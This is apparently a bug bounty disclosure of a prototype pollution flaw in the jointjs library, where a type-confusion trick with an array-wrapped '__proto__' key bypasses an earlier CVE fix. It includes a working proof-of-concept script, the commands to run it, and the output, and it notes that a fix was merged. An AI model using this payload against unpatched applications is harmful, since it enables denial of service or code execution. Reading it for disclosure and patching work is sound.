Prototype Pollution in clientio/joint

Valid

Reported on

Sep 5th 2021


✍️ Description

jointjs package is vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the path components used in the path parameter are arrays. In particular, the condition key === "__proto__" returns false if key is ["__proto__"]. This is because the === operator returns always false when the type of the operands is different.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
const jointjs = require("jointjs");
const obj = {};
console.log("Before : " + {}.polluted);
jointjs.util.setByPath(obj, [["__proto__"],'polluted'], 'Yes! Its Polluted',',');
console.log("After : " + {}.polluted);

Execute the following commands in the terminal:

npm i jointjs # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

Occurences

We have contacted a member of the clientio/joint team and are waiting to hear back 3 months ago
clientio/joint maintainer confirmed that a fix has been merged on e5bf89 3 months ago
The fix bounty has been dropped